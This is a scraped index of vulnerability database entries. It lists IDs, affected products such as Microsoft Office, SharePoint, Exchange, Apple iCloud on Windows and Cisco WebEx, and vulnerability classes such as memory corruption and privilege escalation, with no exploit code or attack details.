Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126726] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [126717] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [126716] Microsoft Office up to 2019 Excel memory corruption [126715] Microsoft Office 365 ProPlus/2016/2019 Excel memory corruption [126620] PrestaShop up to 1.6.1.22/1.7.4.3 on Windows privilege escalation [126258] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126257] Apple iCloud up to 7.7 on Windows WebKit denial of service [126256] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126255] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126254] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126253] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126252] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126251] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126250] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126249] Apple iCloud up to 7.7 on Windows WebKit memory corruption [126248] Apple iCloud up to 7.7 on Windows Safari Reader Universal cross site scripting [126247] Apple iCloud up to 7.7 on Windows Safari Reader Universal cross site scripting [126246] Apple iCloud up to 7.7 on Windows CoreCrypto Prime Number privilege escalation [125565] Oracle MySQL Server up to 8.0.12 Windows privilege escalation [125129] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XML Content XML External Entity [125127] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XMLA File XML External Entity [125126] Microsoft MQTT Object memory corruption [125124] Microsoft SQL Server Management Studio 17.9/18.0 Preview 4 XEL File XML External Entity [125116] Microsoft Exchange Server 2013 CU21/2016 CU10 privilege escalation [125107] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [125105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [125104] Microsoft SharePoint Enterprise Server 2016 privilege escalation [125102] Microsoft Office/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125100] Microsoft Office/PowerPoint 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 Protected View Data Processing Error [125099] Microsoft Office/Excel up to 2019 Protected View Data Processing Error [125095] Microsoft Exchange Server 2013 CU21/2016 CU10 Outlook Web Access privilege escalation [124933] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124924] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124923] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124922] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124921] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124920] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124919] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124918] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124917] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124916] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124915] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124914] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124913] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124912] Cisco WebEx Network Recording Player on Windows ARF File memory corruption [124911] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124910] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation [124402] BigTree CMS 4.2.23 on Windows Rewrite Routing launch.php weak authentication [124371] Microsoft Exchange Server up to 2010 SP3 Outlook Web Access /owa/auth/logon.aspx privilege escalation [124064] Tor Browser up to 7.x on Windows Anonymity information disclosure [123995] Microsoft Lync 2011 on Mac Security Feature privilege escalation [123862] Microsoft SharePoint Enterprise Server 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [123861] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [123860] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [123859] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [123846] Microsoft Office 2016 on Win/Mac memory corruption [123844] Microsoft Word 2013 RT SP1/2013 SP1/2016 PDF File privilege escalation [123840] Microsoft .NET Framework up to 4.7.2 privilege escalation [123459] Docker up to 18.06.0ce-rc1 on Windows HandleRequestAsync privilege escalation [122887] Microsoft Office 2016 on Mac AutoUpdate privilege escalation [122875] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122874] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122873] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [122872] Microsoft SharePoint Enterprise Server 2013 SP1/2016 information disclosure [122871] Microsoft PowerPoint 2010 SP2 memory corruption [122870] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [122868] Microsoft .NET Framework up to 4.7.2 information disclosure [122850] Microsoft Visual Studio 2015 Update 3/2017/2017 Version 15.8 Diagnostic Hub privilege escalation [122824] Microsoft Exchange Server Mail memory corruption [122823] Microsoft SQL Server 2016 SP1/2016 SP2/2017 memory corruption [122714] PHP up to 5.6.36/7.0.30/7.1.19/7.2.7 on Windows link_win32.c linkinfo information disclosure [121932] Cisco WebEx Teams on Windows/macOS privilege escalation [121757] Oracle Java SE 7u181/8u172 Windows DLL privilege escalation [121208] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R Attachment privilege escalation [121121] Microsoft .NET Framework up to 4.7.2 Security Feature weak authentication [121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting [121118] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121117] Microsoft Research JavaScript Cryptography Library Security Feature Incorrect Calculation [121114] Microsoft Access 2013 SP1/2016/2016 C2R memory corruption [121113] Microsoft Lync/Skype for Business privilege escalation [121106] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [121105] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [121100] Microsoft .NET Framework up to 4.7.2 privilege escalation [121098] Microsoft Office 2016/2016 C2R memory corruption [121095] Microsoft .NET Framework 4.7.2 privilege escalation [121094] Microsoft Lync/Skype for Business Security Feature 7PK Security Features [121090] Microsoft Visual Studio up to 2017 Version 15.8 Preview privilege escalation [120986] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120985] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120984] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120983] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120982] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120981] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120980] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120979] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120978] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120977] Apple iCloud up to 7.5 on Windows WebKit race condition [120976] Apple iCloud up to 7.5 on Windows WebKit 7PK Security Features [120975] Apple iCloud up to 7.5 on Windows WebKit privilege escalation [120974] Apple iCloud up to 7.5 on Windows WebKit memory corruption [120973] Apple iCloud up to 7.5 on Windows CFNetwork privilege escalation [119805] ruby-ffi up to 1.9.23 on Windows DLL Loader privilege escalation [119568] Puppet PE Client Tools up to 16.4.5/17.3.5/18.1.1 on Windows Configuration File privilege escalation [119481] Microsoft SharePoint Enterprise Server cross site scripting [119480] Microsoft cross site scripting [119479] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [119478] Microsoft Office Web Apps Server/Office Online Server privilege escalation [119477] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [119475] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 Attachment privilege escalation [118889] windows-latestchromedriver on Node.js Download chromedriver.exe weak encryption [118884] windows-seleniumjar on Node.js Download weak encryption [118882] windows-iedriver 2.48.0 on Node.js Download iedriverserver.exe weak encryption [118880] windows-selenium-chromedriver on Node.js Download weak encryption [118868] windows-seleniumjar-mirror on Node.js Download weak encryption [118749] Apple iCloud up to 7.4 on Windows WebKit information disclosure [118748] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118747] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118746] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118745] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118744] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118743] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118742] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118741] Apple iCloud up to 7.4 on Windows WebKit privilege escalation [118740] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118739] Apple iCloud up to 7.4 on Windows WebKit memory corruption [118738] Apple iCloud up to 7.4 on Windows WebKit race condition [118737] Apple iCloud up to 7.4 on Windows WebKit Data Processing Error [118673] Apple macOS up to 10.13.5 Windows Server memory corruption [118238] McAfee Data Loss Prevention/DLP Endpoint on Windows privilege escalation [118120] Microsoft Office 2016 on Mac XML Data privilege escalation [117561] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1 cross site scripting [117560] Microsoft Exchange Server up to 2016 CU9 memory corruption [117559] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117505] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R information disclosure [117504] Microsoft Office 2010 SP2 information disclosure [117503] Microsoft Exchange Server 2013 CU19/2013 CU20/2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117502] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016 cross site scripting [117501] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [117500] Microsoft Exchange Server 2016 CU8/2016 CU9 Outlook Web Access privilege escalation [117499] Microsoft Exchange Server up to 2016 CU9 information disclosure [117498] Microsoft Office 2016 C2R Security Feature 7PK Security Features [117497] Microsoft SharePoint Enterprise Server 2010/2013 SP1/2016 cross site scripting [117488] Microsoft Azure IoT SDK AMQP weak authentication [117479] Microsoft .NET Framework up to 4.7.1 XML Data XML External Entity [117473] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117472] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117471] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117470] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117469] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [117468] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016/2016 C2R memory corruption [116274] 7-zip up to 18.01 on Windows Access Restriction LsaAddAccountRights privilege escalation [116133] Microsoft Visual Studio information disclosure [116132] Microsoft Office 2016 Memory information disclosure [116051] Microsoft SharePoint Enterprise Server 2016 privilege escalation [116050] Microsoft SharePoint Enterprise Server 2010 SP2/2013/2016 privilege escalation [116049] Microsoft SharePoint Enterprise Server 2013/2016 Redirect [116046] Microsoft SharePoint Enterprise Server 2013/2016 Share privilege escalation [116023] Microsoft Office up to 2016 C2R information disclosure [116022] Microsoft Excel 2010 SP2 memory corruption [116018] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116017] Microsoft Excel up to 2016 C2R memory corruption [116016] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Graphics privilege escalation [116015] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [116014] Microsoft Office 2013 RT SP1/2013 SP1/2016/2016 C2R Data Processing Error [116013] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1 memory corruption [115616] Apple iCloud up to 7.1 on Windows CFNetwork Session memory corruption [115608] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115602] Apple iCloud up to 7.1 on Windows WebKit Redirect [115585] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115580] Apple iCloud up to 7.1 on Windows WebKit memory corruption [115550] Apple iCloud up to 6.1 on Windows WebKit information disclosure [115488] Apple iCloud up to 7.3 on Windows WebKit information disclosure [115487] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115486] Apple iCloud up to 7.3 on Windows WebKit privilege escalation [115485] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115484] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115483] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115482] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115481] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115480] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115479] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115478] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115477] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115476] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115475] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115474] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115473] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115472] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115471] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115470] Apple iCloud up to 7.3 on Windows WebKit memory corruption [115469] Apple iCloud up to 7.3 on Windows Security memory corruption [115445] Apple macOS up to 10.13.4 WindowServer Keylogger 7PK Security Features [115072] Philips IntelliSpace Portal 7.0.x/8.0.x Windows Permission privilege escalation [114579] Microsoft Exchange Server up to 2017 CU8 Outlook Web Access information disclosure [114574] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114573] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114571] Microsoft Exchange Server 2016 CU7/2016 CU8 Outlook Web Access information disclosure [114570] Microsoft Exchange Server 2010 SP3/2013 CU18/2013 CU19/2016 CU7/2016 CU8 Outlook Web Access Fake information disclosure [114564] Microsoft SharePoint Enterprise Server 2013 SP1/2016 privilege escalation [114563] Microsoft Office 2007 SP3/2010 SP2/2013/2013 RT SP1 memory corruption [114562] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114561] Microsoft Office/SharePoint information disclosure [114560] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114559] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114558] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114557] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114556] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114555] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114554] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114553] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114552] Microsoft SharePoint Enterprise Server 2016 privilege escalation [114551] Microsoft Excel up to 2016 C2R Security Feature 7PK Security Features [114549] Microsoft Access 2010 SP2/2013 SP1/2016 memory corruption [113330] HPE System Management Homepage up to 7.6.0 on Windows/Linux privilege escalation [113329] HPE System Management Homepage up to 7.6.0 on Windows/Linux privilege escalation [113328] HPE System Management Homepage up to 7.6.0 on Windows/Linux memory corruption [113327] HPE System Management Homepage up to 7.6.0 on Windows/Linux denial of service [113326] HPE System Management Homepage up to 7.6.0 on Windows/Linux cross site scripting [113237] Microsoft SharePoint Enterprise Server 2016 cross site scripting [113236] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [113235] Microsoft Outlook 2007 SP3/2010 SP2/2013 SP1/2016 privilege escalation [113234] Microsoft Office 2007 SP2/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113233] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [113232] Microsoft Excel 2016 privilege escalation [113216] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113124] LibreOffice up to 6.0.1 COM.MICROSOFT.WEBSERVICE File privilege escalation [112285] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112284] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112283] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112282] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111912] IBM DB2 up to 9.7/10.1 FP5/10.5 FP7 on AIX/Linux/HP/Solaris/Windows Subquery OLAP privilege escalation [111580] Microsoft Office 2016 on Mac Email Attachment privilege escalation [111578] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111577] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111576] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111575] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111574] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111573] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111572] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111571] Microsoft SharePoint Enterprise Server 2013/2016 Access cross site scripting [111570] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111569] Microsoft Office RTF memory corruption [111568] Microsoft Excel 2007/2010/2013/2016 memory corruption [111567] Microsoft Office 2010/2013/2016 memory corruption [111566] Microsoft Word 2007/2010/2013/2016 memory corruption [111565] Microsoft Word 2007/2010/2013 Email Message privilege escalation [111564] Microsoft Word 2016 memory corruption [111563] Microsoft Outlook 2007/2010/2013/2016 Email Message privilege escalation [111562] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111561] Microsoft SharePoint Server 2010/2013/2016 Web Request privilege escalation [111557] Microsoft .NET Framework up to 5.7 XML Data Processing Error [111128] Apple iCloud up to 7.1 on Windows WebKit memory corruption [110670] vBulletin up to 5.3.x on Windows directory traversal [110553] Microsoft Office 2016 C2R information disclosure [110552] Microsoft SharePoint Enterprise Server 2016 Web Request privilege escalation [110551] Microsoft Excel 2016 C2R memory corruption [110550] Microsoft PowerPoint 2013 RT SP1/2013 SP1/2016 information disclosure [110549] Microsoft Exchange Server 2016 CU6/2016 CU7 Outlook Web Access privilege escalation [109519] npm KyleRoss windows-cpu on Node.js privilege escalation [109391] Microsoft SharePoint Enterprise Server 2016 Project Server cross site request forgery [109389] Microsoft Excel 2016 Click-to-Run memory corruption [109388] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 memory corruption [109386] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [109385] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature Macro 7PK Security Features [109381] Microsoft Office/Word 2007 SP3/2010 SP2 memory corruption [109358] Microsoft .NET Framework 1.0/1.1/2.0 weak authentication [109273] Savitech Driver Package on Windows weak authentication [108287] Ikarus Anti Virus 2.16.7 on Windows guardxup.exe privilege escalation [107742] Microsoft Lync/Skype for Business Authentication privilege escalation [107741] Microsoft Outlook 2016 Secure Connection Mail information disclosure [107732] Microsoft Outlook 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107729] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107728] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107727] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [107703] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [107698] Microsoft Office 2016 memory corruption [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method privilege escalation [106545] Microsoft .NET Framework up to 4.7 privilege escalation [106544] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [106531] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [106530] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106529] Microsoft PowerPoint 2016 memory corruption [106528] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106476] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106475] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106474] Microsoft Office 2016 memory corruption [106473] Microsoft SharePoint Server 2013 SP1 cross site scripting [106470] Microsoft Excel 2011 on Mac memory corruption [106455] Microsoft Exchange Server 2013/2016 information disclosure [105723] Atlassian FishEye/Crucible up to 4.4.0 on Windows MultiPathResource directory traversal [105035] Microsoft SharePoint Server 2010 SP2 cross site scripting [105008] Microsoft SQL Server 2012/2014/2016 Analysis Services information disclosure [104584] Microsoft Outlook up to 2016 C2R Document File privilege escalation [104583] Microsoft Outlook up to 2016 C2R Email privilege escalation [104582] Microsoft Outlook up to 2016 C2R Object information disclosure [104285] Apple iCloud up to 6.2.1 on Windows WebKit Web Inspector memory corruption [104284] Apple iCloud up to 6.2.1 on Windows WebKit Page Loading memory corruption [104282] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104281] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104280] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104279] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104278] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104277] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104276] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104275] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104274] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104273] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104272] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104271] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104270] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104269] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104268] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104267] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104266] Apple iCloud up to 6.2.1 on Windows WebKit memory corruption [104265] Apple iCloud up to 6.2.1 on Windows libxml2 information disclosure [104264] Apple iCloud up to 6.2.1 on Windows libxml2 information disclosure [103468] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 Redirect [103443] Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7 privilege escalation [103434] Microsoft Office Object Data Processing Error [103433] Microsoft SharePoint privilege escalation [103426] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103425] Microsoft Exchange Server 2010 SP3/2013 CU16/2013 SP3/2016 CU5 OWA cross site scripting [103422] Microsoft Office Object memory corruption [103421] Microsoft Office Object memory corruption [103403] Microsoft Office Object memory corruption [103214] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103213] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103212] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103211] SWFTools 2013-04-09-1007 on Windows png2swf memory corruption [103145] SWFTools 2013-04-09-1007 on Windows font2swf Access Violation memory corruption [102938] Microsoft Azure AD Connect Password Writeback privilege escalation [102821] Microsoft Skype up to 7.2/7.35/7.36 RDP Clipboard MSFTEDIT.DLL memory corruption [102814] NetKVM Windows Virtio Driver IP Packet privilege escalation [102783] Microsoft Malware Protection Engine up to 1.1.13804.0 on 32-bit mpengine.dll privilege escalation [102463] Microsoft Project Server 2013 SP1 cross site scripting [102462] Microsoft Skype for Business/Lync Server HTML privilege escalation [102460] Microsoft Outlook 2016 on Mac HTML privilege escalation [102448] Microsoft SharePoint Enterprise Server 2016 Reflected cross site scripting [102447] Microsoft PowerPoint/SharePoint Server 2007 SP3 memory corruption [102446] Microsoft Office up to 2016 Data Processing Error [102445] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 Data Processing Error [102444] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [102443] Microsoft Office up to 2016 Data Processing Error [102442] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 7PK Security Features [102441] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [102397] Microsoft Outlook 2010 SP1/2013 SP1/2016 DLL Loader privilege escalation [102396] Microsoft Office 2013 SP1/2016 DLL Loader privilege escalation [101949] BigTree CMS up to 4.2.18 on Windows file-browser.php directory traversal [101614] IBM Informix Open Admin Tool 11.5/11.7/12.1 on Windows privilege escalation [101356] Apple iCloud up to 6.2.0 on Windows WebKit memory corruption [101020] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [101019] Microsoft Skype for Business 2016 Data Processing Error [101018] Microsoft SharePoint 2010 SP2/2013 SP1/2016 Data Processing Error [101017] Microsoft Office 2007 SP3/2010 SP2/2016 Data Processing Error [101016] Microsoft PowerPoint 2011 on Mac memory corruption [101015] Microsoft PowerPoint 2011 on Mac memory corruption [101014] Microsoft Office 2010 SP2/2016 Data Processing Error [101013] Microsoft Office 2010 SP2/2016 privilege escalation [101012] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1/2016 memory corruption [101003] Microsoft .NET Framework up to 4.7 Certificate Validation 7PK Security Features [100801] BMC Server Automation up to 8.6 SP1 Patch 1/8.7 Patch 2 on Windows RSCD Agent privilege escalation [99697] Microsoft SharePoint Server 2010 SP1/2010 SP2 Excel Services cross site scripting [99684] Microsoft Excel 2007 SP3/2010 SP2 Memory information disclosure [99682] Microsoft Outlook 2011 on Mac HTML Tag Validator privilege escalation [99654] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message privilege escalation [99653] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message memory corruption [99533] Microsoft Office 2007/2010/2013/2016 RTF Document Necurs Dridex privilege escalation [98548] ntp up to 4.2.8p9 on Windows Data Structure memory corruption [98476] Microsoft Skype 7.16.0.102 DLL Loader Skype.exe privilege escalation [98097] Microsoft IIS 7.0/7.5/8.0/8.5/10 /uncpath/ cross site scripting [98096] Microsoft Exchange 2013 SP1 cross site scripting [98095] Microsoft Lync for Mac 2011 Certificate Validation weak authentication [98094] Microsoft SharePoint Server 2013 SP1 cross site scripting [98093] Microsoft SharePoint Server/Office Web Apps 2010 SP2 information disclosure [98092] Microsoft SharePoint Server 2007 SP3 memory corruption [98091] Microsoft SharePoint Server/Office Web Apps 2010 SP2 memory corruption [98090] Microsoft SharePoint Server 2010 SP2/2013 SP1 information disclosure [98089] Microsoft Office Web Apps 2013 SP1 memory corruption [98088] Microsoft SharePoint Server 2007 SP3 memory corruption [98087] Microsoft Office 2007 SP3/2010 SP2 information disclosure [98086] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98085] Microsoft Excel 2007 SP3 memory corruption [98084] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98083] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98082] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [98081] Microsoft Excel up to 2016 information disclosure [98080] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98079] Microsoft Word 2016 memory corruption [98078] Microsoft Word/Excel 2007 SP3 memory corruption [98076] Microsoft Lync/Skype for Business 2010/2013/2016 Graphics Component memory corruption [98075] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98074] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98073] Microsoft Office 2010 SP2/Word Viewer Graphics Component privilege escalation [98072] Microsoft Office 2007 SP3/2010 SP2/Word Viewer Graphics Component memory corruption [98071] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [98070] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [97894] Cerberus FTP Server 8.0.10.1 on Windows Header privilege escalation [96363] MyBB/MyBB Merge System up to 1.8.7 on Windows ACP Backup information disclosure [96360] MyBB/MyBB Merge System up to 1.8.7 on Windows Style Import File privilege escalation [95957] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95956] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95955] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95954] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95781] Microsoft PowerPoint 2016 Java Embedded Object privilege escalation [95339] GStreamer up to 1.10.1 windows_icon_typefind information disclosure [95334] ntpd up to 4.2.8p8 on Windows UDP Packet denial of service [95125] Microsoft Word/SharePoint Enterprise Server 2016 Document memory corruption [94460] Microsoft .NET Framework up to <=2.0 weak encryption [94452] Microsoft Office on Mac privilege escalation [94451] Microsoft Office 2011 memory corruption [94450] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [94449] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94448] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94447] Microsoft Office 2010 SP2 memory corruption [94446] Microsoft Office 2016 memory corruption [94445] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 information disclosure [94444] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL Loader Data Processing Error [94443] Microsoft Office up to 2016 information disclosure [94442] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94441] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94440] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [94439] Microsoft Office 2007 SP3/2011 information disclosure 